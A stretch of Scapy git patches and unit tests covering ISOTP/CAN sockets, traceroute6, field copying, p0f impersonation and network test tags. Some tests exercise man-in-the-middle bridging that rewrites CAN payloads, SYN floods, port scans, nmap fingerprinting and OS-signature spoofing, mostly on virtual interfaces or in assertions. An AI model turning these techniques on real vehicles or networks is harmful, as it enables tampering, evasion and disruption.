s.sniff(timeout=2, count=6) + assert(len(pkts) == 6) + isotp = pkts[0] + print(repr(isotp)) + print(hex(isotp.src)) + print(hex(isotp.dst)) + assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) + assert(isotp.src == 0x241) + assert(isotp.dst == 0x541) + += Receive frames from CandumpReader with ISOTPSniffer without extended addressing +candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA''') + +pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_addr": False}) +assert(len(pkts) == 6) +isotp = pkts[0] +assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert (isotp.dst == 0x541) + += Receive frames from CandumpReader with ISOTPSniffer +* all flow control frames are detected as single frame with extended address + +candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA''') + +pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1) +assert(len(pkts) == 12) +isotp = pkts[1] +assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert (isotp.dst == 0x541) +isotp = pkts[0] +assert(isotp.data == dhex("")) +assert (isotp.dst == 0x241) + += Receive frames from CandumpReader with ISOTPSniffer and count +* all flow control frames are detected as single frame with extended address + +candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA + vcan0 541 [8] 10 0A DE AD BE EF AA AA + vcan0 241 [3] 30 00 00 + vcan0 541 [5] 21 AA AA AA AA''') + +pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, count=2) +assert(len(pkts) == 2) +isotp = pkts[1] +assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) +assert (isotp.dst == 0x541) +isotp = pkts[0] +assert(isotp.data == dhex("")) +assert (isotp.dst == 0x241) + += ISOTPSession tests + +ses = ISOTPSession() +ses.on_packet_received(None) +ses.on_packet_received([None, None]) +assert True + += Receive a two-frame ISOTP message +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) + isotp = s.recv() + assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) + += Check what happens when a CAN frame with wrong identifier gets received +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x141, data = dhex("05 01 02 03 04 05"))) + assert(s.ins.rx_queue.empty()) + ++ Testing ISOTPSoftSocket timeouts + += Check if not sending the last CF will make the socket timeout +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) + cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 0A 0B 0C 0D"))) + isotp = s.sniff(timeout=1) + +assert(len(isotp) == 0) + += Check if not sending the first CF will make the socket timeout +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier = 0x241, data = dhex("10 11 01 02 03 04 05 06"))) + isotp = s.sniff(timeout=1) + +assert(len(isotp) == 0) + += Check if not sending the first FC will make the socket timeout +exception = None +isotp = ISOTP(data=dhex("01 02 03 04 05 06 07 08 09 0A")) + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + try: + s.send(isotp) + assert(False) + except Scapy_Exception as ex: + exception = ex + +assert(str(exception) == "TX state was reset due to timeout" or str(exception) == "ISOTP send not completed in 30s") + += Check if not sending the second FC will make the socket timeout +exception = None +isotp = ISOTP(data=b"\xa5" * 120) +test_sem = threading.Semaphore(0) +evt = threading.Event() + +def acker(): + with new_can_socket(iface0) as cans: + evt.set() + can = cans.sniff(timeout=1, count=1)[0] + cans.send(CAN(identifier = 0x241, data=dhex("30 04 00"))) + +thread = Thread(target=acker) +thread.start() +evt.wait(timeout=5) + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + try: + s.send(isotp) + except Scapy_Exception as ex: + exception = ex + +cans.close() +thread.join(15) +assert not thread.is_alive() + +assert(exception is not None) +print(exception) +assert(str(exception) == "TX state was reset due to timeout") + += Check if reception of an overflow FC will make a send fail +exception = None +isotp = ISOTP(data=b"\xa5" * 120) +test_sem = threading.Semaphore(0) +evt = threading.Event() + +def acker(): + with new_can_socket(iface0) as cans: + evt.set() + can = cans.sniff(timeout=1, count=1)[0] + cans.send(CAN(identifier = 0x241, data=dhex("32 00 00"))) + +thread = Thread(target=acker) +thread.start() +evt.wait(timeout=5) + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + try: + s.send(isotp) + except Scapy_Exception as ex: + exception = ex + +thread.join(15) +assert not thread.is_alive() + +assert(exception is not None) + +assert(str(exception) == "Overflow happened at the receiver side") + += Close the Socket +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as s: + s.close() + ++ More complex operations + += ISOTPSoftSocket sr1 +drain_bus(iface0) +drain_bus(iface1) + +evt = threading.Event() +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') +rx2 = None +evt2 = threading.Event() + +def sender(sock): + global evt, rx2, msg + evt2.set() + evt.wait(timeout=5) + rx2 = sock.sr1(msg, timeout=3, verbose=True) + +with new_can_socket0() as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ + new_can_socket0() as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: + txThread = threading.Thread(target=sender, args=(sock_tx,)) + txThread.start() + evt2.wait(timeout=1) + rx = sock_rx.sniff(timeout=3, count=1, started_callback=evt.set)[0] + sock_rx.send(msg) + sent = True + txThread.join(timeout=5) + assert not txThread.is_alive() + +assert(rx == msg) +assert(sent) +assert(rx2 is not None) +assert(rx2 == msg) + += ISOTPSoftSocket sr1 and ISOTP test vice versa +drain_bus(iface0) +drain_bus(iface1) + +rx2 = None +sent = False +evt = threading.Event() +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x123, 0x321) as txSock: + def receiver(): + global rx2, sent + with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rxSock: + evt.set() + rx2 = rxSock.sniff(count=1, timeout=3) + rxSock.send(msg) + sent = True + rxThread = threading.Thread(target=receiver, name="receiver") + rxThread.start() + evt.wait(timeout=5) + rx = txSock.sr1(msg, timeout=5,verbose=True) + rxThread.join(timeout=5) + assert not rxThread.is_alive() + +assert(rx is not None) +assert(rx == msg) +assert(len(rx2) == 1) +assert(rx2[0] == msg) +assert(sent) + += ISOTPSoftSocket sniff + +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') +with new_can_socket0() as isocan1, ISOTPSoftSocket(isocan1, 0x123, 0x321) as sock, \ + new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rx_sock: + msg.data += b'0' + sock.send(msg) + time.sleep(0.01) + msg.data += b'1' + sock.send(msg) + time.sleep(0.01) + msg.data += b'2' + sock.send(msg) + time.sleep(0.01) + msg.data += b'3' + sock.send(msg) + time.sleep(0.01) + msg.data += b'4' + sock.send(msg) + time.sleep(0.01) + rx = rx_sock.sniff(count=5, timeout=5) + +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') +msg.data += b'0' +assert(rx[0] == msg) +msg.data += b'1' +assert(rx[1] == msg) +msg.data += b'2' +assert(rx[2] == msg) +msg.data += b'3' +assert(rx[3] == msg) +msg.data += b'4' +assert(rx[4] == msg) + ++ ISOTPSoftSocket MITM attack tests + += bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package forwarding vcan1 +drain_bus(iface0) +drain_bus(iface1) + +succ = False + +with new_can_socket0() as can0_0, \ + new_can_socket0() as can0_1, \ + new_can_socket1() as can1_0, \ + new_can_socket1() as can1_1, \ + ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, sid=0x141, did=0x141) as bSocket1: + evt = threading.Event() + def forwarding(pkt): + global forwarded + forwarded += 1 + return pkt + def bridge(): + global forwarded, succ + forwarded = 0 + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, + started_callback=evt.set, count=1) + succ = True + threadBridge = threading.Thread(target=bridge) + threadBridge.start() + evt.wait(timeout=5) + packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, count=1, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) + threadBridge.join(timeout=5) + assert not threadBridge.is_alive() + +assert forwarded == 1 +assert len(packetsVCan1) == 1 +assert succ + +drain_bus(iface0) +drain_bus(iface1) + += bridge and sniff with isotp soft sockets and multiple long packets + +drain_bus(iface0) +drain_bus(iface1) + +N = 3 +T = 20 + +succ = False +with new_can_socket0() as can0_0, \ + new_can_socket0() as can0_1, \ + new_can_socket1() as can1_0, \ + new_can_socket1() as can1_1, \ + ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, sid=0x141, did=0x541) as bSocket1: + evt = threading.Event() + def forwarding(pkt): + global forwarded + forwarded += 1 + return pkt + def bridge(): + global forwarded, succ + forwarded = 0 + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, + timeout=T, count=N, started_callback=evt.set) + succ = True + threadBridge = threading.Thread(target=bridge) + threadBridge.start() + evt.wait(timeout=5) + for _ in range(N): + isoTpSocket0.send(ISOTP(b'RequestASDF1234567890')) + packetsVCan1 = isoTpSocket1.sniff(timeout=T, count=N) + threadBridge.join(timeout=5) + assert not threadBridge.is_alive() + +assert forwarded == N +assert len(packetsVCan1) == N +assert succ + +drain_bus(iface0) +drain_bus(iface1) + += bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package change vcan1 + +drain_bus(iface0) +drain_bus(iface1) + +succ = False +with new_can_socket0() as can0_0, \ + new_can_socket0() as can0_1, \ + new_can_socket1() as can1_0, \ + new_can_socket1() as can1_1, \ + ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ + ISOTPSoftSocket(can1_0, sid=0x641, did=0x241) as isoTpSocket1, \ + ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ + ISOTPSoftSocket(can1_1, sid=0x241, did=0x641) as bSocket1: + evt = threading.Event() + def forwarding(pkt): + pkt.data = 'changed' + return pkt + def bridge(): + global succ + bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=5, + started_callback=evt.set, count=1) + succ = True + threadBridge = threading.Thread(target=bridge) + threadBridge.start() + evt.wait(timeout=5) + packetsVCan1 = isoTpSocket1.sniff(timeout=2, count=1, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) + threadBridge.join(timeout=5) + assert not threadBridge.is_alive() + +assert len(packetsVCan1) == 1 +assert packetsVCan1[0].data == b'changed' +assert succ + +drain_bus(iface0) +drain_bus(iface1) + += Two ISOTPSoftSockets at the same time, sending and receiving + +with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ + new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + isotp = ISOTP(data=b"\x10\x25" * 43) + s2.send(isotp) + result = s1.sniff(count=1, timeout=5) + +assert len(result) == 1 +assert(result[0].data == isotp.data) + + += Two ISOTPSoftSockets at the same time, sending and receiving with tx_gap + +with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ + new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + isotp = ISOTP(data=b"\x10\x25" * 43) + s2.send(isotp) + result = s1.sniff(count=1, timeout=5) + +assert len(result) == 1 +assert(result[0].data == isotp.data) + + += Two ISOTPSoftSockets at the same time, multiple sends/receives +with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241) as s1, \ + new_can_socket0() as cs2, ISOTPSoftSocket(cs2, sid=0x241, did=0x641) as s2: + for i in range(1, 40, 5): + isotp = ISOTP(data=bytearray(range(i, i * 2))) + s2.send(isotp) + result = s1.sniff(count=1, timeout=5) + assert len(result) + assert (result[0].data == isotp.data) + + += Send a single frame ISOTP message with padding +with new_can_socket0() as cs1, ISOTPSoftSocket(cs1, sid=0x641, did=0x241, padding=True) as s: + with new_can_socket(iface0) as cans: + s.send(ISOTP(data=dhex("01"))) + res = cans.sniff(timeout=1, count=1)[0] + assert(res.length == 8) + + += Send a two-frame ISOTP message with padding +acker_ready = threading.Event() +def acker(): + with new_can_socket(iface0) as acks: + acker_ready.set() + can = acks.sniff(timeout=1, count=1)[0] + acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) + +with new_can_socket(iface0) as cans: + ack_thread = Thread(target=acker) + ack_thread.start() + acker_ready.wait(timeout=5) + with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("10 08 01 02 03 04 05 06")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x241) + assert(can.data == dhex("30 00 00")) + can = cans.sniff(timeout=1, count=1)[0] + assert(can.identifier == 0x641) + assert(can.data == dhex("21 07 08 CC CC CC CC CC")) + ack_thread.join(timeout=5) + assert not ack_thread.is_alive() + + += Receive a padded single frame ISOTP message with padding disabled +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a padded single frame ISOTP message with padding enabled +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a non-padded single frame ISOTP message with padding enabled +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) + res = s.recv() + assert(res.data == dhex("05 06")) + + += Receive a padded two-frame ISOTP message with padding enabled +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=True) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) + cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + res = s.recv() + assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + + += Receive a padded two-frame ISOTP message with padding disabled +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, padding=False) as s: + with new_can_socket(iface0) as cans: + cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) + cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) + res = s.recv() + res.show() + assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) + ++ Cleanup + += Cleanup reference to ISOTPSoftSocket to let the thread end +s = None + += Delete vcan interfaces + +assert cleanup_interfaces() \ No newline at end of file From d90d3280fc3fc4881913503618c1a3f80927f579 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 19 Aug 2021 22:54:26 +0200 Subject: [PATCH 0645/1632] Fix traceroute6() output --- scapy/layers/inet6.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 7ee7f58cd63..1b702973c9c 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -3351,7 +3351,7 @@ def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), a = TracerouteResult6(a.res) if verbose: - a.display() + a.show() return a, b From aabf4b56f01fa22e039f6cd69e8058e0648b38e0 Mon Sep 17 00:00:00 2001 From: waeva <74464394+waeva@users.noreply.github.com> Date: Sun, 12 Sep 2021 02:09:31 +0800 Subject: [PATCH 0646/1632] Fix do_copy() of class Field (#3365) * Fix do_copy() of class Field Fix PacketListField's copy() method runs differently in python2 and python3. * add test * fix mypy error --- scapy/fields.py | 5 +++-- test/regression.uts | 18 ++++++++++++++++++ 2 files changed, 21 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 2369119de42..569e71f03db 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -257,13 +257,14 @@ def getfield(self, pkt, s): def do_copy(self, x): # type: (I) -> I - if hasattr(x, "copy"): - return x.copy() # type: ignore if isinstance(x, list): x = x[:] # type: ignore for i in range(len(x)): if isinstance(x[i], BasePacket): x[i] = x[i].copy() + return x # type: ignore + if hasattr(x, "copy"): + return x.copy() # type: ignore return x def __repr__(self): diff --git a/test/regression.uts b/test/regression.uts index 340f4558ab2..e09b4c32372 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3955,6 +3955,24 @@ assert(len(a.list) == 1) b = TestPacket() assert(len(b.list) == 0) += Test PacketListField deepcopy +class SubPacket(Packet): + name = "SubPacket" + fields_desc = [ + ByteField("mem", 1), + ] + +class TestPacket(Packet): + name = "TestPacket" + fields_desc = [ + PacketListField("packlist", SubPacket(), SubPacket), + ] + +a = TestPacket() +b = a.copy() +fuzz(b) +assert(a.packlist[0].mem == 1) + = PacketField class InnerPacket(Packet): From 2308248b8c4384924012579674b3e982115c078b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 11 Sep 2021 20:09:59 +0200 Subject: [PATCH 0647/1632] Fix p0f impersonation: MSS value too low --- scapy/modules/p0f.py | 2 +- scapy/tools/UTscapy.py | 1 - test/p0f.uts | 10 ++++++++++ 3 files changed, 11 insertions(+), 2 deletions(-) diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index 73f4eebe094..d3744038d71 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -854,7 +854,7 @@ def int_only(val): if mss_hint and 0 <= mss_hint <= maxmss: options.append(("MSS", mss_hint)) else: # invalid hint, generate new value - options.append(("MSS", random.randint(1, maxmss))) + options.append(("MSS", random.randint(100, maxmss))) else: options.append(("MSS", sig.mss)) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 9c8b388c835..17c1cdc218d 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -1069,7 +1069,6 @@ def main(): try: if NON_ROOT or os.getuid() != 0: # Non root # Discard root tests - KW_KO.append("netaccess") KW_KO.append("needs_root") if VERB > 2: print(" " + arrow + " Non-root mode") diff --git a/test/p0f.uts b/test/p0f.uts index e802d7b63f1..9b389d523f7 100644 --- a/test/p0f.uts +++ b/test/p0f.uts @@ -78,6 +78,16 @@ assert fingerprint_mtu(pkt) == "Ethernet or modem" pkt = p0f_impersonate(IP()/TCP(), osgenre="Linux", osdetails="3.11 and newer") assert p0f(pkt) == (("s", "unix", "Linux", "3.11 and newer"), 0, False) += Check incidence of MSS value on linux version detection +~ netaccess + +pkt = IP(ttl=64, flags=2)/TCP(options=[('MSS', 14), ('SAckOK', ''), ('Timestamp', (2638474259, 0)), ('NOP', None), ('WScale', 7)], window=280, seq=3964706621, flags=2) +assert p0f(pkt) == (('g', 'unix', 'Linux', '2.2.x-3.x'), 0, False) + +pkt[TCP].options = [('MSS', 100), ('SAckOK', ''), ('Timestamp', (2638474259, 0)), ('NOP', None), ('WScale', 7)] +pkt[TCP].window = 100*20 +assert p0f(pkt) == (("s", "unix", "Linux", "3.11 and newer"), 0, False) + = Impersonate when window size must be multiple of some integer sig = "*:64:0:1460:%8192,0:mss,nop,ws::0" pkt = p0f_impersonate(IP()/TCP(), signature=sig) From ee6bd918e4172dad6e6b19f28792a76dc0dd171a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 11 Sep 2021 20:30:37 +0200 Subject: [PATCH 0648/1632] Casual reminder that needs_root!=netaccess --- test/nmap.uts | 8 +++--- test/regression.uts | 47 ++++++++++++++++++--------------- test/scapy/layers/dns.uts | 4 +-- test/scapy/layers/dns_edns0.uts | 2 +- test/scapy/layers/l2.uts | 2 +- test/sendsniff.uts | 2 +- test/tuntap.uts | 8 +++--- 7 files changed, 38 insertions(+), 35 deletions(-) diff --git a/test/nmap.uts b/test/nmap.uts index aca6bbb8c35..5dd15f3eb94 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -41,21 +41,21 @@ print(conf.nmap_kdb.base, conf.nmap_kdb.filename, len(conf.nmap_kdb.get_base())) assert len(conf.nmap_kdb.get_base()) > 100 = fingerprint test: www.secdev.org -~ netaccess +~ netaccess needs_root score, fprint = nmap_fp('www.secdev.org') print(score, fprint) assert score > 0.5 assert fprint = fingerprint test: gateway -~ netaccess +~ netaccess needs_root score, fprint = nmap_fp(conf.route.route('0.0.0.0')[2]) print(score, fprint) assert score > 0.5 assert fprint = fingerprint test: to text -~ netaccess +~ netaccess needs_root import re as re_ @@ -65,7 +65,7 @@ for x in nmap_sig2txt(a).split("\n"): assert re_.match(r"\w{2,4}\(.*\)", x) = nmap_udppacket_sig test: www.google.com -~ netaccess +~ netaccess needs_root a = nmap_sig("www.google.com", ucport=80) assert len(a) > 3 diff --git a/test/regression.uts b/test/regression.uts index e09b4c32372..23c3a7163bc 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1351,7 +1351,7 @@ assert ssid == "ROUTE-821E295" * Those tests need network access = Sending and receiving an ICMP -~ netaccess IP ICMP icmp_firewall +~ netaccess needs_root IP ICMP icmp_firewall def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False @@ -1365,7 +1365,7 @@ def _test(): retry_test(_test) = Sending a TCP syn message at layer 2 and layer 3 -~ netaccess IP +~ netaccess needs_root IP def _test(): tmp = send(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), return_packets=True, realtime=True) assert(len(tmp) == 1) @@ -1382,7 +1382,7 @@ def _test(): retry_test(_test) = Latency check: localhost ICMP -~ netaccess linux latency +~ netaccess needs_root linux latency sock = conf.L3socket conf.L3socket = L3RawSocket @@ -1425,7 +1425,7 @@ for pkt in sniffer.results: assert pkt.sniffed_on == iface = Sending a TCP syn 'forever' at layer 2 and layer 3 -~ netaccess IP +~ netaccess needs_root IP def _test(): tmp = srloop(IP(dst="8.8.8.8")/TCP(sport=RandShort(), dport=53, flags="S"), count=1, timeout=3) assert(type(tmp) == tuple and len(tmp[0]) == 1) @@ -1436,7 +1436,7 @@ def _test(): retry_test(_test) = Sending and receiving an TCP syn with flooding methods -~ netaccess IP flood +~ netaccess needs_root IP flood from functools import partial # flooding methods do not support timeout. Packing the test for security def _test_flood(ip, flood_function, add_ether=False): @@ -1603,7 +1603,7 @@ assert a.sent_time is None + Real usages = Port scan -~ netaccess IP TCP +~ netaccess needs_root IP TCP def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False @@ -1620,7 +1620,7 @@ def _test(): retry_test(_test) = Send & receive with debug_match -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): old_debug_match = conf.debug_match conf.debug_match = True @@ -1636,7 +1636,7 @@ def _test(): retry_test(_test) = Send & receive with retry -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False @@ -1647,7 +1647,7 @@ def _test(): retry_test(_test) = Send & receive with multi -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): old_debug_dissector = conf.debug_dissector conf.debug_dissector = False @@ -1658,16 +1658,19 @@ def _test(): retry_test(_test) = Traceroute function -~ netaccess tcpdump +~ netaccess needs_root tcpdump * Let's test traceroute -ans, unans = traceroute("www.slashdot.org") -ans.nsummary() -s,r=ans[0] -s.show() -s.show(2) +def _test(): + ans, unans = traceroute("www.slashdot.org") + ans.nsummary() + s,r=ans[0] + s.show() + s.show(2) + +retry_test(_test) = send() and sniff() -~ netaccess +~ netaccess needs_root def _test(): sendp(Ether()/IP(src="9.0.0.0")/UDP(), count=3, iface=conf.iface) @@ -1680,7 +1683,7 @@ r = sniff(timeout=3, count=1, assert r = GH issue 3306 -~ netaccess +~ netaccess needs_root send(fuzz(ARP())) @@ -1725,7 +1728,7 @@ assert _test_select() True = Test set of sent_time by sr -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): packet = IP(dst="8.8.8.8")/ICMP() r = sr(packet, timeout=2) @@ -1734,7 +1737,7 @@ def _test(): retry_test(_test) = Test set of sent_time by sr (multiple packets) -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): packet1 = IP(dst="8.8.8.8")/ICMP() packet2 = IP(dst="8.8.4.4")/ICMP() @@ -1745,7 +1748,7 @@ def _test(): retry_test(_test) = Test set of sent_time by srflood -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): packet = IP(dst="8.8.8.8")/ICMP() r = srflood(packet, timeout=2) @@ -1754,7 +1757,7 @@ def _test(): retry_test(_test) = Test set of sent_time by srflood (multiple packets) -~ netaccess IP ICMP +~ netaccess needs_root IP ICMP def _test(): packet1 = IP(dst="8.8.8.8")/ICMP() packet2 = IP(dst="8.8.4.4")/ICMP() @@ -2260,7 +2263,7 @@ assert len(conf.temp_files) == tempfile_count = Run scapy's tshark command -~ netaccess +~ needs_root tshark(count=1, timeout=3) = Check wireshark() diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 94a8ce3336e..5d1903bdbff 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -4,7 +4,7 @@ ~dns = DNS request -~ netaccess IP UDP DNS +~ netaccess needs_root IP UDP DNS * A possible cause of failure could be that the open DNS (resolver1.opendns.com) * is not reachable or down. def _test(): @@ -18,7 +18,7 @@ def _test(): dns_ans = retry_test(_test) = DNS packet manipulation -~ netaccess IP UDP DNS +~ netaccess needs_root IP UDP DNS dns_ans.show() dns_ans.show2() dns_ans[DNS].an.show() diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index 33907f53e8d..ba225bf1dab 100644 --- a/test/scapy/layers/dns_edns0.uts 